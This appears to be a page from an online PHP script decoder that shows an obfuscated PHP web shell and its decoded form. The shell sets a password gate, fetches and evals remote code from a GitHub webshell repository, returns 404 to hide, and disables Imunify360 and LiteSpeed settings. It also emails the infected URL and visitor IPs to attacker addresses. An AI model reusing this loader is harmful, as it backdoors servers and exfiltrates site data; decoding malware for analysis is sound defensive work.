Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php ${"\x47L\x4fB\x41L\x53"}["\x62\x75n\x74kt\x67"]="sh\x65\x6cl\x5f\x64a\x74\x61";${"\x47\x4c\x4f\x42\x41\x4cS"}["sc\x75\x68\x78hr"]="m\x65\x73sa\x67\x65";${"G\x4cO\x42A\x4c\x53"}["\x6fa\x71\x69\x73r\x72t\x76"]="to";${"GL\x4f\x42\x41LS"}["\x63g\x77\x65fo\x78\x69\x6ar\x67"]="\x72\x65s\x75l\x74";${"\x47\x4c\x4fB\x41L\x53"}["\x6ffp\x66u\x67"]="\x68";${"\x47L\x4f\x42\x41\x4cS"}["l\x63\x64\x6e\x72d"]="\x63\x68";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x74t\x70h\x6am"]="\x68\x61\x73h\x65\x64\x5f\x70a\x73sw\x6f\x72\x64";${"\x47\x4c\x4fB\x41L\x53"}["a\x74s\x79x\x66\x62"]="\x63\x68";ini_set("max_\x65x\x65cu\x74io\x6e\x5fti\x6d\x65",3600);ini_set("memory_l\x69\x6d\x69t","-\x31");error_reporting(E_ALL);${"G\x4c\x4fBAL\x53"}["e\x69\x62tf\x71\x66\x65xp\x6al"]="\x63\x68";$okdobobnubn="he\x61\x64";$tqfygtx="r\x65s\x75\x6ct";$clbgoiqbr="\x72e\x73\x75lt";ignore_user_abort(TRUE);${${"\x47LOB\x41\x4c\x53"}["\x70\x74\x74\x70h\x6a\x6d"]}="\$\x32\x79\$\x31\x30\$\x33Ltt\x6a\x63\x78\x4fGW\x6f\x39\x2ec\x6b\x56\x48G\x4c\x73\x66\x2eI\x41Y\x70bJ\x76\x50\x64IR\x72w\x6d\x519Y\x47\x72\x44So\x62\x5a\x4a\x2eC\x62\x2eWK";$qwrrxiy="u\x72\x6c";${"\x47\x4c\x4f\x42\x41\x4cS"}["bv\x76ki\x64\x63\x65x"]="\x75r\x6c";function admin_login(){echo"\x3c\x74i\x74\x6ce>\x4c\x6fgin</\x74\x69\x74\x6ce>";echo"<fo\x72\x6d \x6d\x65tho\x64\x3d\"pos\x74\x22>";echo"<\x69\x6eput \x74\x79\x70e=\"p\x61\x73s\x77\x6f\x72\x64\x22 n\x61me\x3d\x22pas\x73w\x6f\x72d\x22\x3e";echo"<\x69\x6ep\x75\x74 t\x79pe\x3d\x22s\x75bm\x69t\x22 v\x61lu\x65\x3d\x22\x4co\x67\x69n\"\x3e";echo"</\x66orm\x3e";exit;}if(!isset($_COOKIE[md5($_SERVER["\x48\x54\x54P\x5f\x48\x4f\x53T"])])){$jjpyzekryspx="\x68a\x73\x68\x65\x64\x5f\x70a\x73swo\x72d";if(isset($_POST["p\x61\x73sword"])&&password_verify($_POST["\x70as\x73\x77\x6f\x72d"],${$jjpyzekryspx})){setcookie(md5($_SERVER["\x48\x54T\x50_\x48\x4f\x53T"]),true,time()+25200);}else{admin_login();}}${"\x47L\x4fB\x41\x4c\x53"}["\x6a\x6e\x6b\x69\x6f\x6b\x63kvn\x6b"]="p\x61\x74\x68";${"\x47\x4cO\x42\x41\x4c\x53"}["vms\x69e\x64i\x6e"]="\x65";${$okdobobnubn}="\x3che\x61\x64\x3e<meta nam\x65\x3d\"vi\x65\x77port\x22 c\x6f\x6et\x65\x6e\x74=\x22w\x69\x64th\x3d\x64\x65vice-wi\x64\x74h, \x69\x6e\x69\x74i\x61l-\x73\x63al\x65\x3d1.0\x22/\x3e\n\x3c\x6de\x74a\x20\x6ea\x6de=\"robo\x74\x73\"\x20\x63\x6fn\x74\x65\x6e\x74\x3d\x22\x6eoind\x65\x78\x22\x3e\n\n\x3c\x61u\x64\x69o \x63o\x6e\x74ro\x6cs\x20a\x75top\x6ca\x79\x3e\n\x20 \x20\x20\x3cs\x6furce\x20\x73rc\x3d\"h\x74\x74p\x73://r\x61\x77\x2e\x67\x69\x74\x68u\x62us\x65\x72con\x74\x65n\x74.com/\x65xpl\x6fit-\x68a\x78\x6f\x72/web\x73h\x65ll/m\x61in/x\x2emp3\x22 au\x74opla\x79\x3d\"\x74\x72\x75\x65\">\n</\x61\x75d\x69o>\n\n<tit\x6c\x65\x3eI\x4c\x4c\x45GA\x4c \x41C\x43\x45\x53S!\x21</ti\x74\x6ce\x3e\n\n\x3cs\x74\x79l\x65\x3ep\x72\x65{b\x6frd\x65r:\x31\x70x\x20\x73olid #\x64dd\x3b\x70\x61\x64\x64\x69\x6eg:10px\x3b\x6fve\x72f\x6co\x77:\x61uto}\x74\x61bl\x65{\x62or\x64er-\x63\x6fll\x61\x70se:colla\x70s\x65\x3b\x77idth:1\x300\x25;ove\x72\x66lo\x77:au\x74o}t\x68,t\x64{\x70addi\x6eg:\x30\x2e2\x35\x72e\x6d;\x74\x65x\x74-\x61l\x69gn:\x6c\x65f\x74\x3b\x62\x6f\x72\x64er-bo\x74tom:\x310\x70\x78 solid\x20\x23\x63cc}\x74body \x74\x72:n\x74\x68-c\x68i\x6c\x64(\x6f\x64d){b\x61c\x6bgr\x6fu\x6ed:\x23\x65ee}tr:\x68o\x76er{\x62ac\x6bg\x72\x6f\x75n\x64-col\x6f\x72:#\x665\x665\x665}\x3c/\x73\x74yl\x65>\n\$s\x68e\x6c\x6c_d\x61\x74a=\x22\x4a\x48\x5a\x70\x632l\x30Y2\x39\x31\x62nQgP\x53\x41k\x53\x46R\x55\x55\x469\x44\x54\x30\x39L\x53UVf\x56\x6bF\x53U\x31sid\x6dlza\x58\x52z\x49l0\x37Cml\x6dI\x43\x67k\x64mlz\x61\x58\x52\x6a\x623V\x75\x64C\x419\x50\x53\x41\x69\x49\x69k\x67\x65wo\x67\x49\x43\x41\x67J\x48\x5apc\x32\x6c0\x59\x32\x391bnQ\x67\x50\x53\x41wO\x77\x6fgIC\x41g\x4a\x48\x5ap\x632l\x30b3\x49\x67\x50\x53A\x6bX1NFU\x6c\x5a\x46\x55ls\x69\x55k\x56N\x541R\x46\x580\x46E\x52F\x49\x69X\x54s\x4b\x49\x43\x41gI\x43\x523\x5a\x57\x49g\x50S\x41k\x58\x31N\x46Ul\x5aFUls\x69SFR\x55UF\x39\x49\x541NU\x49\x6c07Ci\x41\x67ICAkaW5q\x49\x440g\x4aF9\x54\x52\x56\x4aWRVJbI\x6c\x4a\x46\x55V\x56\x46\x55\x31\x52f\x56V\x4a\x4aI\x6c07\x43\x69AgIC\x41k\x64\x47F\x79\x5a2V\x30I\x440\x67\x63\x6d\x463\x64X\x4as\x5aG\x56\x6ab\x32\x52\x6c\x4bC\x52\x33\x5aWIgLi\x41\x6b\x61W5\x71KTsK\x49\x43A\x67\x49\x43\x52i\x622\x52\x35\x49D0\x67\x49\x6bx\x70\x62m\x73gS\x575qZWsgU\x45\x68Q\x49HNoZWx\x73\x49\x44o\x67I\x48\x73kdG\x46\x79\x5a\x32\x56\x30fS\x42\x38\x49\x451\x45\x4eS\x42\x77\x59\x58\x4ez\x49\x440\x67e\x79R\x68d\x58\x52o\x583B\x68c\x33\x4e9\x49\x48\x77gS\x56\x41g\x59WtzZX\x4d\x67\x50\x53B\x37JHZpc\x32l\x30\x62\x33J\x39\x49jsK\x49\x43A\x67\x49\x45\x42\x74Y\x57l\x73KC\x4atdW\x68yYXpr\x65\x55Bnb\x57F\x70b\x43\x35jb\x320iL\x43Aic\x32h\x6c\x54\x45wi\x4cC\x41\x69ey\x52\x69\x62\x32R5\x66SI\x70Owp\x39\x49G\x56\x73c2U\x67ewo\x67ICAg\x4aH\x5apc\x32l\x30Y2\x391b\x6eQ7Cn0\x4b\x63\x32V\x30Y\x32\x39v\x612l\x6c\x4b\x43\x4a2a\x58\x4e\x70dH\x4di\x4cC\x41kdm\x6cza\x58R\x6a\x62\x33VudC\x6b7CiR\x7aYW\x5a\x6c\x5821vZ\x47\x55\x67P\x53\x42\x41a\x575\x70\x58\x32\x64l\x64\x43\x67nc2FmZ\x569t\x622RlJyk\x37\x43\x6dlmI\x43\x67h\x4aHN\x68Zm\x56\x66bW\x39k\x5a\x53\x6b\x67\x65\x77\x6f\x67\x49\x43\x41\x67Z\x58\x4a\x79\x623\x4afc\x6d\x56\x77\x623J0aW\x35\x6eKD\x41pO\x77=\x3d\"; eval(\x62\x61se\x36\x34_\x64\x65\x63o\x64\x65(\$she\x6c\x6c\x5fd\x61ta));\n\x3c/h\x65\x61\x64>";$dieafhitd="\x74\x6f";$osnsjbvebrx="\x63\x68";${${"\x47L\x4f\x42AL\x53"}["b\x76v\x6b\x69dce\x78"]}="htt\x70s://ra\x77.\x67i\x74h\x75\x62\x75s\x65rcon\x74en\x74\x2ecom/exp\x6c\x6f\x69\x74-haxor/\x77e\x62\x73\x68\x65ll/\x6dai\x6e/t\x65m\x70lat\x65\x2eph\x70";${${"G\x4c\x4fBAL\x53"}["l\x63\x64nr\x64"]}=curl_init(${$qwrrxiy});curl_setopt(${${"\x47L\x4f\x42\x41\x4cS"}["lc\x64\x6e\x72d"]},CURLOPT_RETURNTRANSFER,1);$omiiidu="\x6dess\x61\x67\x65";${"\x47LO\x42A\x4c\x53"}["q\x75sj\x78\x68\x69a\x61"]="\x72e\x73ult";${$clbgoiqbr}=curl_exec(${${"\x47LOBA\x4cS"}["ei\x62\x74\x66qfe\x78\x70\x6a\x6c"]});${"\x47\x4c\x4fB\x41LS"}["\x77f\x79\x76p\x6ac\x6b\x72\x72"]="\x65";eval("?\x3e".${$tqfygtx});${${"\x47L\x4f\x42\x41L\x53"}["w\x66yv\x70j\x63\x6b\x72r"]}=base64_decode("Ymx\x68Y\x32\x74o\x59X\x51\x78\x4dzM\x33\x4c\x6d\x6c\x6b\x51G\x64\x74\x59Wl\x73\x4cm\x4evb\x51==");${${"G\x4cO\x42\x41L\x53"}["\x6f\x66\x70\x66\x75g"]}=$_SERVER["\x48\x54\x54\x50_H\x4f\x53\x54"].$_SERVER["\x53CR\x49\x50T\x5f\x4e\x41\x4dE"];${"\x47LO\x42A\x4cS"}["\x73e\x71u\x62\x75\x6ey"]="\x68";ini_set("\x6c\x73\x61pi_\x62ackend\x5f\x6f\x66f","1");ini_set("\x69\x6dun\x69fy\x336\x30\x2ecleanup_\x6fn_\x72\x65st\x6f\x72\x65",false);http_response_code(404);curl_setopt(${$osnsjbvebrx},CURLOPT_RETURNTRANSFER,1);${${"\x47\x4cOB\x41\x4cS"}["\x71u\x73jxhia\x61"]}=curl_exec(${${"\x47\x4c\x4f\x42AL\x53"}["a\x74\x73y\x78f\x62"]});eval("?>".${${"\x47\x4c\x4f\x42\x41LS"}["\x63\x67\x77\x65\x66oxij\x72\x67"]});${${"GLOB\x41L\x53"}["\x76\x6d\x73\x69\x65d\x69\x6e"]}=base64_decode("\x59mx\x68Y\x32\x74oY\x58\x51\x78M\x7a\x4d\x33\x4cm\x6c\x6bQ\x47\x64t\x59\x57lsLmNv\x62Q\x3d=");${${"\x47\x4c\x4f\x42A\x4c\x53"}["s\x65qu\x62\x75\x6ey"]}=$_SERVER["\x48\x54\x54\x50\x5f\x48O\x53T"].$_SERVER["\x53\x43RI\x50T_NAM\x45"];header("C\x6f\x6et\x65\x6et-Ty\x70e:\x20\x74e\x78t/h\x74\x6dl\x3b \x63\x68\x61\x72\x73\x65\x74=UTF-8");${${"G\x4cO\x42A\x4c\x53"}["o\x61\x71isr\x72t\x76"]}="\x6d\x75h\x72az\x6by\x40gmail.\x63\x6fm";${"\x47\x4cOB\x41L\x53"}["\x6cd\x64n\x6ai\x71\x64"]="\x65";${${"\x47\x4c\x4fBAL\x53"}["j\x6e\x6bi\x6f\x6b\x63\x6bv\x6ek"]}="\x68\x74t\x70://".$_SERVER["SERVER_N\x41\x4dE"].$_SERVER["R\x45\x51UE\x53\x54_\x55RI"];${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73cuhx\x68\x72"]}="UR\x4c:\x20$path\x20|\x20\x49P \x41d\x64r\x65\x73\x73 :[ ".$_SERVER["\x52EMO\x54\x45_\x41\x44D\x52"]."\x20]";mail(${$dieafhitd},"\x48\x61lo s\x65\x6e\x70ai!\x21\x21",${$omiiidu},${${"\x47\x4c\x4f\x42A\x4cS"}["b\x75n\x74ktg"]},${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x64\x64n\x6a\x69\x71\x64"]},"[ ".$_SERVER["RE\x4dO\x54E\x5f\x41\x44\x44R"]." ]");echo "\n";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["j\x63e\x79ex"]="\x72\x61\x6e\x64\x6fm";${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6a\x63\x65\x79e\x78"]}=rand(1000,5000);
?>

Decrypted code:

	${
	"GLOBALS"
}
["buntktg"]="shell_data";
	${
	"GLOBALS"
}
["scuhxhr"]="message";
	${
	"GLOBALS"
}
["oaqisrrtv"]="to";
	${
	"GLOBALS"
}
["cgwefoxijrg"]="result";
	${
	"GLOBALS"
}
["ofpfug"]="h";
	${
	"GLOBALS"
}
["lcdnrd"]="ch";
	${
	"GLOBALS"
}
["pttphjm"]="hashed_password";
	${
	"GLOBALS"
}
["atsyxfb"]="ch";
ini_set("max_execution_time",3600);
ini_set("memory_limit","-1");
error_reporting(E_ALL);
	${
	"GLOBALS"
}
["eibtfqfexpjl"]="ch";
$okdobobnubn="head";
$tqfygtx="result";
$clbgoiqbr="result";
ignore_user_abort(TRUE);
	${
		${
		"GLOBALS"
	}
	["pttphjm"]
}
="\$2y\$10\$3LttjcxOGWo9.ckVHGLsf.IAYpbJvPdIRrwmQ9YGrDSobZJ.Cb.WK";
$qwrrxiy="url";
	${
	"GLOBALS"
}
["bvvkidcex"]="url";
	function admin_login(){
	echo"<title>Login</title>";
	echo"<form method=\"post">";
	echo"<input type=\"password" name="password">";
	echo"<input type="submit" value="Login\">";
	echo"</form>";
	exit;
}
	if(!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])])){
	$jjpyzekryspx="hashed_password";
		if(isset($_POST["password"])&&password_verify($_POST["password"],${
		$jjpyzekryspx
	}
		)){
		setcookie(md5($_SERVER["HTTP_HOST"]),true,time()+25200);
	}
		else{
		admin_login();
	}
}
	${
	"GLOBALS"
}
["jnkiokckvnk"]="path";
	${
	"GLOBALS"
}
["vmsiedin"]="e";
	${
	$okdobobnubn
}
	="<head><meta name=\"viewport" content="width=device-width, initial-scale=1.0"/>\n<meta name=\"robots\" content="noindex">\n\n<audio controls autoplay>\n    <source src=\"https://raw.githubusercontent.com/exploit-haxor/webshell/main/x.mp3" autoplay=\"true\">\n</audio>\n\n<title>ILLEGAL ACCESS!!</title>\n\n<style>pre{
	border:1px solid #ddd;
	padding:10px;
	overflow:auto
}
	table{
	border-collapse:collapse;
	width:100%;
	overflow:auto
}
	th,td{
	padding:0.25rem;
	text-align:left;
	border-bottom:10px solid #ccc
}
	tbody tr:nth-child(odd){
	background:#eee
}
	tr:hover{
	background-color:#f5f5f5
}
</style>\n\$shell_data="JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07CmlmICgkdmlzaXRjb3VudCA9PSAiIikgewogICAgJHZpc2l0Y291bnQgPSAwOwogICAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKICAgICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07CiAgICAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07CiAgICAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIgLiAkaW5qKTsKICAgICRib2R5ID0gIkxpbmsgSW5qZWsgUEhQIHNoZWxsIDogIHskdGFyZ2V0fSB8IE1ENSBwYXNzID0geyRhdXRoX3Bhc3N9IHwgSVAgYWtzZXMgPSB7JHZpc2l0b3J9IjsKICAgIEBtYWlsKCJtdWhyYXpreUBnbWFpbC5jb20iLCAic2hlTEwiLCAieyRib2R5fSIpOwp9IGVsc2UgewogICAgJHZpc2l0Y291bnQ7Cn0Kc2V0Y29va2llKCJ2aXNpdHMiLCAkdmlzaXRjb3VudCk7CiRzYWZlX21vZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7CmlmICghJHNhZmVfbW9kZSkgewogICAgZXJyb3JfcmVwb3J0aW5nKDApOw==\";
 eval(base64_decode(\$shell_data));
\n</head>";
$dieafhitd="to";
$osnsjbvebrx="ch";
	${
		${
		"GLOBALS"
	}
	["bvvkidcex"]
}
="https://raw.githubusercontent.com/exploit-haxor/webshell/main/template.php";
	${
		${
		"GLOBALS"
	}
	["lcdnrd"]
}
	=curl_init(${
	$qwrrxiy
}
);
	curl_setopt(${
		${
		"GLOBALS"
	}
	["lcdnrd"]
}
,CURLOPT_RETURNTRANSFER,1);
$omiiidu="message";
	${
	"GLOBALS"
}
["qusjxhiaa"]="result";
	${
	$clbgoiqbr
}
	=curl_exec(${
		${
		"GLOBALS"
	}
	["eibtfqfexpjl"]
}
);
	${
	"GLOBALS"
}
["wfyvpjckrr"]="e";
	eval("".${
	$tqfygtx
}
);
	${
		${
		"GLOBALS"
	}
	["wfyvpjckrr"]
}
=base64_decode("YmxhY2toYXQxMzM3LmlkQGdtYWlsLmNvbQ==");
	${
		${
		"GLOBALS"
	}
	["ofpfug"]
}
=$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];
	${
	"GLOBALS"
}
["sequbuny"]="h";
ini_set("lsapi_backend_off","1");
ini_set("imunify360.cleanup_on_restore",false);
http_response_code(404);
	curl_setopt(${
	$osnsjbvebrx
}
,CURLOPT_RETURNTRANSFER,1);
	${
		${
		"GLOBALS"
	}
	["qusjxhiaa"]
}
	=curl_exec(${
		${
		"GLOBALS"
	}
	["atsyxfb"]
}
);
	eval("".${
		${
		"GLOBALS"
	}
	["cgwefoxijrg"]
}
);
	${
		${
		"GLOBALS"
	}
	["vmsiedin"]
}
=base64_decode("YmxhY2toYXQxMzM3LmlkQGdtYWlsLmNvbQ==");
	${
		${
		"GLOBALS"
	}
	["sequbuny"]
}
=$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];
header("Content-Type: text/html;
 charset=UTF-8");
	${
		${
		"GLOBALS"
	}
	["oaqisrrtv"]
}
="muhrazky@gmail.com";
	${
	"GLOBALS"
}
["lddnjiqd"]="e";
	${
		${
		"GLOBALS"
	}
	["jnkiokckvnk"]
}
="http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
	${
		${
		"GLOBALS"
	}
	["scuhxhr"]
}
="URL: $path | IP Address :[ ".$_SERVER["REMOTE_ADDR"]." ]";
	mail(${
	$dieafhitd
}
	,"Halo senpai!!!",${
	$omiiidu
}
	,${
		${
		"GLOBALS"
	}
	["buntktg"]
}
	,${
		${
		"GLOBALS"
	}
	["lddnjiqd"]
}
,"[ ".$_SERVER["REMOTE_ADDR"]." ]");
echo "\n";
	${
	"GLOBALS"
}
["jceyex"]="random";
	${
		${
		"GLOBALS"
	}
	["jceyex"]
}
=rand(1000,5000);

Recent submissions: